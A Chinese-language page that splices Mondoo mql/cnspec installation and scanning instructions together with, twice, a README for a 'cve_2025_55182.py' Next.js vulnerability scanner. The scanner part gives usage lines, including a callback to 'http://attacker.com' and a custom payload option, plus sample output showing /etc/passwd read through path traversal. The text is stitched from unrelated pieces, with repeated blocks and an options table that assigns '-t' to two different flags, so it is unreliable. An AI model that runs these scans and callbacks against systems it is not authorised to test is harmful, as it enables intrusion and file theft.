安装 mql 和 cnspec 最简单的方法是使用安装脚本。
https://install.mondoo.com/sh```bash
bash -c "$(curl -sSL https://install.mondoo.com/sh)"
### 通过 PowerShell (Windows)
[`https://install.mondoo.com/ps1`](https://install.mondoo.com/ps1)```powershell
Set-ExecutionPolicy Unrestricted -Scope Process -Force;
[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072;
iex ((New-Object System.Net.WebClient).DownloadString('https://install.mondoo.com/ps1'));
Install-Mondoo;
使用 -x(Linux 和 macOS)或 -Proxy(Windows)将代理传递给安装脚本。该脚本会将其自身的下载、软件包安装、cnspec login 以及自动更新程序都通过该代理进行路由。脚本的初始下载发生在读取该标志之前,因此也请将初始下载指向该代理:```bash
export https_proxy='http://proxy.example.com:3128'
curl -sSL --proxy "$https_proxy" https://install.mondoo.com/sh | bash -s -- -x "$https_proxy"
## 使用示例
### 基本用法
```bash
# 扫描单个目标
python3 cve_2025_55182.py -t https://target.example.com
# 使用代理扫描
python3 cve_2025_55182.py -t https://target.example.com -p http://127.0.0.1:8080
# 从文件扫描多个目标
python3 cve_2025_55182.py -f targets.txt
# 使用自定义超时和线程数
python3 cve_2025_55182.py -f targets.txt -T 15 -t 20
# 使用自定义回调域名进行带外检测
python3 cve_2025_55182.py -t https://target.example.com -c your-collab-domain.oastify.com
# 详细输出并保存结果
python3 cve_2025_55182.py -f targets.txt -v -o results.json
# 使用自定义 User-Agent 和请求头
python3 cve_2025_55182.py -t https://target.example.com -A "Mozilla/5.0 (Custom)" -H "X-Forwarded-For: 127.0.0.1"
| 选项 | 描述 | 默认值 |
|---|---|---|
-t, --target | 单个目标 URL | - |
-f, --file | 包含目标 URL 的文件 | - |
-p, --proxy | 用于请求的代理 URL | - |
-c, --callback | 用于带外检测的回调域名 | - |
-T, --timeout | 请求超时时间(秒) | 10 |
-t, --threads | 并发线程数 | 10 |
-A, --user-agent | 自定义 User-Agent 字符串 | 随机 |
-H, --header | 自定义请求头(可多次使用) | - |
-o, --output | 输出文件(JSON 格式) | - |
-v, --verbose | 启用详细输出 | False |
--no-color | 禁用彩色输出 | False |
该工具采用多种检测技术:
[+] 正在扫描: https://target.example.com
[+] 检测到 Next.js 版本: 15.0.3
[!] 目标可能存在漏洞: https://target.example.com
[+] 发现敏感文件: /etc/passwd
[+] 扫描完成。发现 1 个存在漏洞的目标。
{
"scan_time": "2025-01-15T10:30:00Z",
"targets_scanned": 1,
"vulnerable_targets": [
{
"url": "https://target.example.com",
"nextjs_version": "15.0.3",
"vulnerable": true,
"evidence": {
"type": "path_traversal",
"file": "/etc/passwd",
"content_preview": "root:x:0:0:root:/root:/bin/bash"
}
}
]
}
该漏洞存在于 Next.js 中间件处理 URL 编码路径的方式中。通过发送包含特定编码序列的请求,攻击者可以绕过路径规范化并访问预期 Web 根目录之外的文件。
本工具仅供教育和授权安全测试目的使用。未经授权访问计算机系统是违法的。请务必获得适当授权后再测试任何系统。作者对因使用本工具造成的任何误用或损害不承担责任。```powershell Set-ExecutionPolicy Unrestricted -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; $wc = New-Object System.Net.WebClient; $wc.Proxy = New-Object System.Net.WebProxy('http://proxy.example.com:3128'); iex ($wc.DownloadString('https://install.mondoo.com/ps1')); Install-Mondoo -Proxy 'http://proxy.example.com:3128';
在 Linux 和 macOS 上,当未指定 `-x` 时,会自动采用继承的 `https_proxy` 或 `http_proxy`。无论哪种方式,两种形式都会被导出,因此发行版自身的软件仓库——在 Debian 和 Ubuntu 上是纯 HTTP——也会通过代理访问。你设置的任何 `no_proxy` 都会原样传递,包括跨 `sudo` 时。
代理 URL 必须是纯 URL:如果它携带凭据,请对凭据进行百分号编码(`!` 编码为 `%21`,依此类推)。该值会被写入自动更新程序的计划任务中,因此在那里需要引号的字符会被拒绝,而不是被转义。
## 扫描你的目标平台
扫描你的[目标平台](https://github.com/mondoohq/cnspec/#supported-targets):```bash
# query system information with incident and inventory query pack
mql scan aws
# scan the platform for security vulnerabilities
cnspec scan aws
注册 Mondoo 账户以访问更多策略并存储报告。如需了解更多信息,联系我们。```bash cnspec login -t 'eyJh...llZ4BW'
mql 和 cnspec 支持本地和远程目标,包括服务器(Linux、Windows、macOS)、云(AWS、Azure、Google、VMware)、Kubernetes(EKS、GKE、AKS、自管理)、容器、容器注册表、SaaS 产品(Google Workspace、M365、GitHub、GitLab)等。
运行扫描:```bash
# scan your local host
cnspec scan local
# scan a cloud environment
cnspec scan aws
cnspec scan gcp
cnspec scan azure
# scan a kubernetes cluster
cnspec scan k8s
# scan a docker image from a remote registry
cnspec scan docker image debian:12
# scan a docker container (get ids from docker ps)
cnspec scan docker container 00fa961d6b6a
# scan a system over ssh
cnspec scan ssh [email protected]
https://install.mondoo.com/package/cnspec/{platform}/{arch}/{filetype}/{version}/{method}
参数支持以下值:
| 参数 | 值 |
|---|---|
platform | linux、windows、darwin |
arch | amd64、arm64、armv7、armv6、386、ppc64le |
filetype | tar.gz、deb、rpm、zip、pkg、msi |
version | latest 或具体版本号 |
method | download、filename、version、sha256 |
https://install.mondoo.com/package/cnspec/linux/arm64/rpm/latest/download
## 使用示例
### 基本用法
```bash
# 扫描单个目标
python3 cve_2025_55182.py -t https://target.example.com
# 使用代理扫描
python3 cve_2025_55182.py -t https://target.example.com -p http://127.0.0.1:8080
# 从文件扫描多个目标
python3 cve_2025_55182.py -f targets.txt
# 使用自定义超时时间扫描
python3 cve_2025_55182.py -t https://target.example.com --timeout 15
# 详细输出
python3 cve_2025_55182.py -t https://target.example.com -v
# 使用自定义回调地址进行扫描
python3 cve_2025_55182.py -t https://target.example.com --callback http://attacker.com
# 使用自定义载荷进行扫描
python3 cve_2025_55182.py -t https://target.example.com --payload "custom_payload"
# 使用自定义用户代理进行扫描
python3 cve_2025_55182.py -t https://target.example.com --user-agent "Mozilla/5.0"